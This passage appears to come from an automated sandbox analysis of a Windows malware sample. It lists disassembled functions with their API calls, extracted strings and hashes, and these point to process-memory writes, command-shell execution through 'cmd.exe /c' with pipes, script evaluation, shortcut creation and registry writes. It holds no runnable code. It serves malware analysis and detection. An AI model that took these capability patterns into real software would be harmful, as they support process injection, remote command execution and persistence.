                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MemoryMove
                                                                • String ID: '$u
                                                                • API String ID: 1951056069-331672930
                                                                • Opcode ID: 26023d8b7e58ca016e934d13238cb56d070382c71a77a40d83c306161d3bb78a
                                                                • Instruction ID: 3f404da0f855f2c5c69f31bd84441b0c590d82e6ca3be49810bad399dc1d6898
                                                                • Opcode Fuzzy Hash: 26023d8b7e58ca016e934d13238cb56d070382c71a77a40d83c306161d3bb78a
                                                                • Instruction Fuzzy Hash: 3DF2BF78E04248EFEF509F91DC85FAE7BB0FF09304F10005AE5417A2A6D7B959A5CB1A
                                                                Function 0041CB09 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 118COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CoInitialize.OLE32(00000000), ref: 0041CB1A
                                                                Strings
                                                                • MSScriptControl.ScriptControl, xrefs: 0041CB58
                                                                • Eval, xrefs: 0041CC5F
                                                                • Language, xrefs: 0041CBAB
                                                                • var , xrefs: 0041CC2F
                                                                • AddCode, xrefs: 0041CBEC
                                                                • function get__nodeValue(str_json,recursion){for(var i in str_json){var a=Object.prototype.toString.call(str_json[i]);if(a=="[object Object]"||a=="[object Array]"){if(recursion){get__nodeValue(str_json[i],recursion)}}else if(a=="[object String]"||a=="[object Nu, xrefs: 0041CBE0
                                                                • JavaScript, xrefs: 0041CB9F
                                                                • = {}, str_Code = String.fromCharCode(9216), str_reg = new RegExp(str_Code, 'g'), xrefs: 0041CC25
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Initialize
                                                                • String ID: = {}, str_Code = String.fromCharCode(9216), str_reg = new RegExp(str_Code, 'g')$AddCode$Eval$JavaScript$Language$MSScriptControl.ScriptControl$function get__nodeValue(str_json,recursion){for(var i in str_json){var a=Object.prototype.toString.call(str_json[i]);if(a=="[object Object]"||a=="[object Array]"){if(recursion){get__nodeValue(str_json[i],recursion)}}else if(a=="[object String]"||a=="[object Nu$var
                                                                • API String ID: 2538663250-2654358664
                                                                • Opcode ID: 1d1310e4ac4fc97b0947317aff526f91825837d4607a436115a7b746fff16ed3
                                                                • Instruction ID: 24cce2134c01d221050d30b612f51e52db9d720af8c72c4253d44875d8cb6bc6
                                                                • Opcode Fuzzy Hash: 1d1310e4ac4fc97b0947317aff526f91825837d4607a436115a7b746fff16ed3
                                                                • Instruction Fuzzy Hash: D141FB70F80318BBEB11DE91DCC2F997720AB19B55F605065FB043F2C2D2B96A509BA9
                                                                Function 00484331 Relevance: 12.2, APIs: 2, Strings: 6, Instructions: 152COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CoInitialize.OLE32(00000000), ref: 004843BE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Initialize
                                                                • String ID: .lnk$CreateShortcut$TargetPath$WshShell$a5H$wshom.ocx
                                                                • API String ID: 2538663250-3272274830
                                                                • Opcode ID: 1c00ac6332f443c0f02dc4059b7789810e49503227b15afd75e69efd0ec3108f
                                                                • Instruction ID: 838c4f81521e202fdc8917d5353b3ed106abfbd60f702f09bfe244e0d7279858
                                                                • Opcode Fuzzy Hash: 1c00ac6332f443c0f02dc4059b7789810e49503227b15afd75e69efd0ec3108f
                                                                • Instruction Fuzzy Hash: 4B41D7B4F80304BBF761AA959C43F6D76649718B18F20406AFB047E2C2E6F56E50875E
                                                                Function 004B4458 Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 471stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • lstrlenW.KERNEL32(00000000,00000000,004FEE86,004FEE8E,00000000), ref: 004B4532
                                                                • RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 004B4719
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MemoryMovelstrlen
                                                                • String ID: \$]
                                                                • API String ID: 456560858-2127938089
                                                                • Opcode ID: 7e487d9619168f8c878125d6f25fa9446b778675d83d92a84d314e00d37673bb
                                                                • Instruction ID: fecb142ee1be013bd6d1529f7c08e9672d50dee9e9dd88d70854cdb4bb6ba67e
                                                                • Opcode Fuzzy Hash: 7e487d9619168f8c878125d6f25fa9446b778675d83d92a84d314e00d37673bb
                                                                • Instruction Fuzzy Hash: 1B12C230D04A0CEBDF10AFD2E9497EDBB74FF88304F218099E19175196CB795A65DB28
                                                                Function 0046090D Relevance: 10.3, APIs: 2, Strings: 3, Instructions: 1512COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: getpeername$getsockname$ws2_32.dll
                                                                • API String ID: 0-838878439
                                                                • Opcode ID: 61d78212e67c447dab4d2183a6dab53c33a02aaa6f00942ce58c5c4d72f8fc88
                                                                • Instruction ID: 0dc56ae39d8f86d452794faa6f93f2ecd37b2508afc82bff44ca603aa3f69cf1
                                                                • Opcode Fuzzy Hash: 61d78212e67c447dab4d2183a6dab53c33a02aaa6f00942ce58c5c4d72f8fc88
                                                                • Instruction Fuzzy Hash: 4FB22FB5A00315ABEF50DF95DCC5B9EB7F8EB0D314F14042AE905BB352E6799D008B2A
                                                                Function 00484C33 Relevance: 9.6, APIs: 4, Strings: 1, Instructions: 868processstringpipeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00484F2B
                                                                • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,00000000,000000FF,00000000), ref: 0048506D
                                                                • lstrcpyn.KERNEL32(00000000,00000000,00000000), ref: 004851F9
                                                                • CallWindowProcA.USER32(00668787,00000000,?,00000001,00000000), ref: 0048524A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CallCreateNamedPeekPipeProcProcessWindowlstrcpyn
                                                                • String ID: cmd.exe /c
                                                                • API String ID: 3413392740-3798715461
                                                                • Opcode ID: d6c6a1667658be1e546dc342c56ac357c93b63279e7563adc2836efd9e185868
                                                                • Instruction ID: ab92fca58498fc1924689056b9499e5cecc841b96ee57d45f8658c8331e1d7d3
                                                                • Opcode Fuzzy Hash: d6c6a1667658be1e546dc342c56ac357c93b63279e7563adc2836efd9e185868
                                                                • Instruction Fuzzy Hash: 97627EB1E41305ABEB00EF95ECC6B9EB7B5EB09314F141429F905BB381E379A910CB59
                                                                Function 004AA65D Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 634threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetCurrentThreadId.KERNEL32 ref: 004AA866
                                                                • SetProcessAffinityMask.KERNEL32(FFFFFFFF,FFFFFFFF), ref: 004AAAB8
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AffinityCurrentMaskProcessThread
                                                                • String ID: ],rax$mov [0x$ret
                                                                • API String ID: 3622693022-2134748970
                                                                • Opcode ID: 1ae453a3dcb403751e804d1bef97addfa422179fa1e9c94cad3adacb3b83b762
                                                                • Instruction ID: dfc63a8e7e60f75f3b939ed51e374e43ae5ab97b189047feb82918aa96917c69
                                                                • Opcode Fuzzy Hash: 1ae453a3dcb403751e804d1bef97addfa422179fa1e9c94cad3adacb3b83b762
                                                                • Instruction Fuzzy Hash: E3325EB1A40208AFEB10DFA8DC81FAE7BB5EF19314F144119F614BB391D379A950CB69
                                                                Function 00460247 Relevance: 8.0, APIs: 5, Instructions: 459processCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004602B0
                                                                • Process32First.KERNEL32(00000000,00000000), ref: 00460383
                                                                • CloseHandle.KERNEL32(00000000), ref: 00460547
                                                                • Process32Next.KERNEL32(00000000,00000000), ref: 00460611
                                                                • CloseHandle.KERNEL32(00000000), ref: 004606FB
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
                                                                • String ID:
                                                                • API String ID: 1789362936-0
                                                                • Opcode ID: f703beaa3f9aeffefffc974c2871b68232af773f08d5c652aa7cadf1cd85846a
                                                                • Instruction ID: c1a93710d61ed2eabfc36d62ce33f0d4d879a71da2f6fc480fa189e9640fceb6
                                                                • Opcode Fuzzy Hash: f703beaa3f9aeffefffc974c2871b68232af773f08d5c652aa7cadf1cd85846a
                                                                • Instruction Fuzzy Hash: 3CE151F1A402469BFB00DF98DCC1B6AB7B0EF59324F180435E506AB341E379B960CB56
                                                                Function 004B0399 Relevance: 7.5, Strings: 5, Instructions: 1275COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MemoryProcessWrite
                                                                • String ID: S&h$a&h$o&h$}&h$}&h
                                                                • API String ID: 3559483778-3193924603
                                                                • Opcode ID: 3ce1dd03fe71b2803ef2739e4467677a3dbaeef5d20290f2331be66fc4bf1366
                                                                • Instruction ID: 0ac220fd7c3496660519a580b874d2e10d4488ea8239d481055ca088058f3e98
                                                                • Opcode Fuzzy Hash: 3ce1dd03fe71b2803ef2739e4467677a3dbaeef5d20290f2331be66fc4bf1366
                                                                • Instruction Fuzzy Hash: FF822CB6A00205AFEB50EFA9DCC5BEFB7F8EB49315F14042AE604E7242D6349D118B75
                                                                Function 004567F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 111stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FindWindowA.USER32(Notepad,00000000), ref: 00456818
                                                                • GetDlgItem.USER32(?,0000000F), ref: 0045684C
                                                                • lstrcpyn.KERNEL32(00000000,00000000,00000000), ref: 004568FE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FindItemWindowlstrcpyn
                                                                • String ID: Notepad
                                                                • API String ID: 3951413068-311999004
                                                                • Opcode ID: f83f8e0cc82985009841a82288eb73f602e43f4cea1c31e0691253b60d17bc33
                                                                • Instruction ID: bf20f17e1ae9199014fe6291792054e7db79045e83e8598795d6c0681024b63b
                                                                • Opcode Fuzzy Hash: f83f8e0cc82985009841a82288eb73f602e43f4cea1c31e0691253b60d17bc33
                                                                • Instruction Fuzzy Hash: 3F316074E40309BBDB10AF91DC0BBAEBB31AB06711F44506AF6043A1D1D3B65A24CF9A
                                                                Function 0043C7F8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(user32.DLL,?,0043C795,00000000,?), ref: 0043C810
                                                                • GetProcAddress.KERNEL32(00000000,wsprintfA), ref: 0043C844
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressHandleModuleProc
                                                                • String ID: user32.DLL$wsprintfA
                                                                • API String ID: 1646373207-3653994968
                                                                • Opcode ID: dfafbff2654b82a22ea1829939c6bdd63fcb1cca63b5f382e424d34a7353dad7
                                                                • Instruction ID: f2e47ace501a0477dcc52f30a64c43e12f5837c61600fcec98973547d5e07530
                                                                • Opcode Fuzzy Hash: dfafbff2654b82a22ea1829939c6bdd63fcb1cca63b5f382e424d34a7353dad7
                                                                • Instruction Fuzzy Hash: 3E012C74E00208FFCB10EF95EC4ABAEBB74BB0A711F005065F904BB290D3B58A10CB99
                                                                Function 0041ABE8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,?,?,?,00429A2A), ref: 0041ABF9
                                                                • GetProcAddress.KERNEL32(?,RegSetValueExA), ref: 0041AC2D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressHandleModuleProc
                                                                • String ID: RegSetValueExA$kernel32.dll
                                                                • API String ID: 1646373207-1396291221
                                                                • Opcode ID: 6beabbcf7b221807771d0892331222e3f34b8d524521140fc2f6234c573d3bce
                                                                • Instruction ID: 93cec9d62f47fb63bb88bf8370e06111439822ea48c4d37c84943e4b9941b9ee
                                                                • Opcode Fuzzy Hash: 6beabbcf7b221807771d0892331222e3f34b8d524521140fc2f6234c573d3bce
                                                                • Instruction Fuzzy Hash: 46F04F70E45304FBC7109F52A9077ADBA719706701F1051BBB5087B291E67945609EAF
                                                                Function 0040E173 Relevance: 6.4, APIs: 4, Instructions: 446processCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000,?,?,?,0040E152,00000000,00000001,00000001,00000000,00000001), ref: 0040E1F4
                                                                • Process32FirstW.KERNEL32(000000FF,00000000), ref: 0040E2D1
                                                                • Process32NextW.KERNEL32(000000FF,00000000), ref: 0040E503
                                                                • CloseHandle.KERNEL32(000000FF,?,?,?,?,?,0040E152,00000000,00000001,00000001,00000000,00000001), ref: 0040E5ED
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
